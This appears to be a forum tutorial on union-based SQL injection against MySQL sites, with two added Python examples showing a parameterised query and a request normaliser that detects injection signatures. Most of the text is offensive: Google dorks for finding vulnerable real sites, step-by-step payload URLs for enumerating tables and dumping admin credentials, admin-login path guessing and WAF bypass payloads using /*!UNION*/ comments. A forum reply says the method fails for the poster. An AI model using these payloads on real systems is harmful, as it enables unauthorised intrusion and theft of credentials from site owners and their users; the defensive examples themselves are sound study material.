What Is an SQL Injection?

 

An SQL injection is a code injection attack: input that the site drops straight into a database query is crafted so that the database runs it as SQL. The injected SQL is then used to pull information out of the database, such as emails, usernames and passwords.

In this tutorial we'll be looking for the admin panel's credentials. Keep in mind I said admin panel, not control panel. While performing an SQL injection you won't always find what you're looking for: some sites have secured the important information so that it can't be compromised so easily.

 

Finding a Vulnerable Site

 

You can find a vulnerable site using dorks. Use Google, it's the best way. A dork is a search query that looks something like this:

inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=

 

There are hundreds of thousands of others, and there are also some posts about dorks, so read those if you want to find a good site to exploit with SQL injection.

 

Exploiting the Database

 

Alright, are you all ready for the fun of an SQL injection? First we need to test our site to see if it's vulnerable. I will use a made-up site name for my example:

http://www.hopefullyvulnerablesite.com/event.php?id=1

 

Our URL HAS to have a parameter in it (an '=' followed by a value). Otherwise there is nothing for us to inject into. So after the 1 (the ID) put a ' so that it looks like this:

http://www.hopefullyvulnerablesite.com/event.php?id=1'

 

Now if we get a MySQL error, our site is probably vulnerable: the stray quote broke the query and the page printed the database's complaint. If the page just refreshes normally, then our site is not vulnerable.

 

Finding the number of columns

 

Now we know our site is vulnerable to SQL injection, so we want to start getting the info out of the database. But before we do that, we have to find out WHICH columns are vulnerable. We don't know how many columns the query has yet, so we need that first. To find the number of columns we use the 'order by' clause: ordering by a column number that doesn't exist gives an error, so we count up until that happens. Your URL should now look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--

 

If the site just refreshed to its normal state, that's good: no error. So we keep going up by one until we get an error.

 

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--

*NO ERROR*

 

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--

*NO ERROR*

 

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--

*ERROR*

 

Okay, we got an error at 5. That means there are only 4 columns: since a 5th column doesn't exist, ordering by it fails.

 

 

Tip: The two hyphens (--) are critical. They start an SQL comment, so whatever the site's own query had after our injection point is ignored and our command runs cleanly. So we NEED those at the end of every command.

 

Finding the vulnerable column

 

We now have the number of columns. Now we need to find out which one(s) are vulnerable, meaning which ones actually get printed on the page, because those are where our commands can run. For that we use 'union select', which adds a row of our own values to the query's result. After union select we list one value per column, so with 4 columns our URL should look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--

 

A couple of numbers will appear on the page. That is normal, and is a good sign. Those numbers are the columns that get printed, so those are the columns we need to execute our commands in. Let's say column 2 appeared on the page. We will be executing commands in column 2.

 

 

Tip: You HAVE to have the - after the = (a negative ID that matches nothing). That is critical: with no real row to show, the page displays the row our union select supplies instead.
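To see why the quote test, the order by count and the union select numbers behave the way they do, here is an added example that is not code from the original post: a tiny lookup in the style of event.php?id= written the vulnerable way and the safe way, run against an in-memory SQLite database standing in for MySQL. The event table, its rows and every function name are constructed for this demo; SQLite's error wording differs from MySQL's, but it fails on the same inputs.

```python
"""Added example, not code from the original post: a lookup in the style of
event.php?id= written two ways and run against an in-memory SQLite database
that stands in for MySQL. The 'event' table, its rows and all function names
are constructed for this demo."""
import sqlite3


def make_db():
    # Constructed schema: four columns, matching the 4 columns counted above.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE event (id INTEGER PRIMARY KEY, title TEXT, body TEXT, day TEXT)")
    con.executemany("INSERT INTO event VALUES (?, ?, ?, ?)", [
        (1, "Launch", "Grand opening", "2011-03-01"),
        (2, "Patch", "Update notes", "2011-03-09"),
    ])
    return con


def lookup_vulnerable(con, id_param):
    """Glues the raw id into the SQL text: the mistake the tutorial relies on.
    Returns ("ok", rows) or ("error", message)."""
    sql = "SELECT id, title, body, day FROM event WHERE id=" + id_param
    try:
        return "ok", con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)


def lookup_safe(con, id_param):
    """Binds the id as a parameter: the input is a value, never part of the SQL."""
    rows = con.execute("SELECT id, title, body, day FROM event WHERE id=?",
                       (id_param,)).fetchall()
    return "ok", rows


def probe(id_param):
    """Runs one id value through both versions on a fresh database.
    Returns (vulnerable_status, vulnerable_result, safe_status, safe_rows)."""
    con = make_db()
    v_status, v_result = lookup_vulnerable(con, id_param)
    s_status, s_rows = lookup_safe(con, id_param)
    con.close()
    return v_status, v_result, s_status, s_rows


if __name__ == "__main__":
    # The same probes the tutorial types into the URL, in the same order.
    for value in ["1", "1'", "1 order by 4--", "1 order by 5--", "-1 union select 1,2,3,4--"]:
        v_status, v_result, s_status, s_rows = probe(value)
        print(f"id={value!r}\n  vulnerable: {v_status} {v_result}\n  safe:       {s_status} {s_rows}")
```

In the vulnerable version the quote produces a syntax error (the "MySQL error" the tutorial looks for), order by 5 fails because there is no 5th column, and the union row (1, 2, 3, 4) is what prints the numbers on the page; the safe version returns no error and no rows for all of those inputs.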

 

Determining the Version of the MySQL Database

 

Why do we need the version, you ask? Because the version tells us what commands we can use. I consider version 5 easier (the information_schema tables we query below exist from MySQL 5 onward), so I will show how to get information from a version 5 database.

 

Our vulnerable column is 2, so that's where we'll be executing the code. Replace the 2 with your command. The command is @@version. So your URL should now look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--

 

Now it should display the Version on the page. It should look something like this:

5.1.47-community-log

 

The exact numbers don't matter, as long as the version is 5 or over.

 

Finding the name of the Database

 

The name of the database is important, at least if we want to look in the tables, which is where the information is. To find the name of the database there are 2 common ways, and both work. The first command is:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--

 

Sometimes that command will show you more than our database's name, because it lists every schema the site's database user can see. All we want is the current database name, so the better command is:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--

 

Now you will be shown the database name. Congrats, look how far we are already. Now to the good stuff!

 

Viewing the Tables in the Database

 

The tables are what contain the information. That's why we need to list them, so we can get the information we seek.

 

The command to list the tables is longer than the ones we've seen so far. Here's what your URL should now look like:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

 

Hit enter, and the tables in the database will be displayed.

 

Viewing the Tables' information

 

We will most likely be given many tables. It is up to you to decide which one contains the valuable information.

 

It can be difficult to choose a table that would contain important information. We won't always need the username, as it is most likely "admin", but the password is what we REALLY need. So choose a table. The one I will use for this example is "admin_credentials". It's very rare that you'll get a table with a title that gives it away like that. Now use this query:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"

 

For that query you will almost ALWAYS get an error, because the quotes around the table name get escaped or filtered before they reach the database. So instead, convert 'admin_credentials' to hex, which needs no quotes at all.

 

 

Once you've converted your table name to hex, run the query again with the hex value in place of the quoted name. It should look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73

 

You MUST have the 0x before the hex digits. The 0x tells MySQL that the literal is a hex string, so it's critical. Otherwise it will NOT work.

Displaying the Contents

 

The query above lists the columns inside the table you've chosen. Now you need to get the data out of those columns, and that usually means goodbye tables, and HELLO admin panel access.

 

Let's say mine is displaying "userpword" and "user". Those are the only columns showing for me (this will very rarely be the case). We need to read the information in there. We can actually read both at once, but if you prefer one at a time, use this query:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--

 

That will display the information. Where it says DBName, put the name of the database you got earlier in this tutorial, and where it says admin_credentials, put the table you are inside of.

 

Now we should have all the credentials, so we just need to find the Admin Login.

Finding the Admin Login

 

Usually all you'll have to do is take a quick look by adding a small /admin or /index.php/admin to the site's address.

 

Like this:

http://www.hopefullyvulnerablesite.com/admin
http://www.hopefullyvulnerablesite.com/admin.php
http://www.hopefullyvulnerablesite.com/login.php
http://www.hopefullyvulnerablesite.com/admin/index.php
http://www.hopefullyvulnerablesite.com/login/index.php
http://www.hopefullyvulnerablesite.com/adminlogin
http://www.hopefullyvulnerablesite.com/adminlogin.php
http://www.hopefullyvulnerablesite.com/adminlogin/index.php
http://www.hopefullyvulnerablesite.com/moderator.php
http://www.hopefullyvulnerablesite.com/moderator
http://www.hopefullyvulnerablesite.com/modlogin

 

And there are plenty more. At times you won't find the login, so you'll need an "admin login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it gives you more pride after hacking the website.

 

WAF By-Passing

 

You may be asking, what is WAF bypassing? First off, I'll explain what a WAF is.

 

WAF stands for Web Application Firewall. A web application firewall is put in front of a website so that it is protected from attacks such as SQL injection, XSS and other exploitation methods. The WAF filters the requests that carry commands to the database and detects attacks against the site.

 

A WAF Error will look like this:

FORBIDDEN

You are not allowed to access "" on this server
*INFORMATION ABOUT THE WEBSERVER IS HERE*

 

If we get that error when we're using union select, there is a WAF in front of the webserver. So in order to bypass it, we'll have to change the syntax of the command so that the filter doesn't recognise it as an attack.

 

There are several methods to bypass a WAF; I'll be explaining a few:

 

1.

You don't have to worry about getting the number of columns, the firewalls don't block that. However, they DO block the union select command, so here is method 1 on how to bypass the firewall.

 

The code we're going to use wraps the keywords in different "symbols" to get past the filter. The /*! ... */ wrapper is a MySQL-specific comment: MySQL executes the text inside it, but a filter that only looks for the plain text "union select" sees nothing to match. It looks like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--

 

That will bypass the firewall. However, we still have several steps, because we still need the other information from the tables and columns.

 

Once that is done, we'll be getting the information from the vulnerable columns, so here's what it should look like:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--

 

To make this tutorial a little shorter, we'll grab more information with just one command. So let's try it like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--

 

Now it should be displaying the information we asked for IN ORDER: the version, then the database username, then the database name, separated by colons (0x3a is the hex for ':').

 

Now we'll be getting the table names, so we again have to bypass the WAF. This time the command will look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--

 

That will display all the tables. Now, to get at the chosen table's columns, we're going to use this command to bypass the firewall:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--

 

There we go, now we're looking at the table's columns. Now we want to dump the columns, so here's what we'll use:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*

 

And that's all for WAF bypassing. Hopefully now you're an SQL injection expert :). If you need any more help, feel free to PM me, or add a comment. I really hope this helped, good luck!
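Looking at the same tricks from the defender's side, here is an added example that is not code from the original post and not any real WAF's rule set; it covers both the hex-encoded table name trick from the columns section and the /*!UNION*/ wrapping in this section. It normalises a request the way MySQL would read it before matching signatures, so mixed case, URL encoding, version comments and 0x literals no longer hide the query. The sample request lines are constructed from the payload shapes in this post, and the signature list and function names are my own.

```python
"""Added example (not code from the post or from any WAF product): normalise a
request the way MySQL would read it, then match signatures and decode 0x
literals for the alert. Sample requests are constructed from the shapes shown
in the post; function and signature names are constructed here."""
import re
from urllib.parse import unquote_plus

# Constructed sample of request paths, as they might appear in an access log.
SAMPLE_REQUESTS = [
    "/event.php?id=1",
    "/event.php?id=1 order by 5--",
    "/event.php?id=-1 union select 1,2,3,4--",
    "/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user()),3--",
    ("/event.php?id=-1%20/*!UNION*/%20/*!SELECT*/%201,Group_Concat(column_name),3"
     "%20from%20/*!information_schema*/.columns%20where"
     "%20table_name=0x61646d696e5f63726564656e7469616c73--"),
]

# /*!UNION*/ is a MySQL version comment: MySQL executes the text inside it, so the
# normaliser keeps that text (and drops any version number after the '!').
VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)      # ordinary comments are dropped
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})\b")     # 0x61646d... style string literals

# Constructed signature list: fragments the post's own queries rely on.
SIGNATURES = ["union select", "order by", "information_schema", "@@version",
              "version()", "user()", "database()", "group_concat("]


def normalize(raw):
    """URL-decode, unwrap version comments, strip other comments, lowercase and
    collapse whitespace, giving the text MySQL would effectively parse."""
    text = unquote_plus(raw)
    text = VERSION_COMMENT.sub(r" \1 ", text)
    text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text.lower()).strip()


def decode_hex_literals(text):
    """Replace 0x... literals with the quoted ASCII they encode, so an alert shows
    the table name that was asked for; anything that is not ASCII is left as-is."""
    def repl(match):
        try:
            return "'" + bytes.fromhex(match.group(1)).decode("ascii") + "'"
        except ValueError:          # odd length or non-ASCII bytes
            return match.group(0)
    return HEX_LITERAL.sub(repl, text)


def naive_union_check(raw):
    """What a plain case-insensitive filter does; it misses /*!UNION*/ /*!SELECT*/."""
    return "union select" in raw.lower()


def classify(raw):
    """Return (normalised text, matched signatures) for one request path."""
    norm = decode_hex_literals(normalize(raw))
    return norm, [sig for sig in SIGNATURES if sig in norm]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        norm, hits = classify(req)
        print(f"naive={naive_union_check(req)!s:5} hits={hits}\n   {norm}")
```

Signature matching on the normalised text is the point, not the list itself: a production rule set would be far longer, but any rule that runs on the raw request text is defeated by exactly the rewrites this post describes.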

 


 

Posted

Doesn't seem to work, whenever I change the order by x--

page just refreshes, tried putting order by 5145555--

still just refreshes, tried on numerous sites with 'id' in it
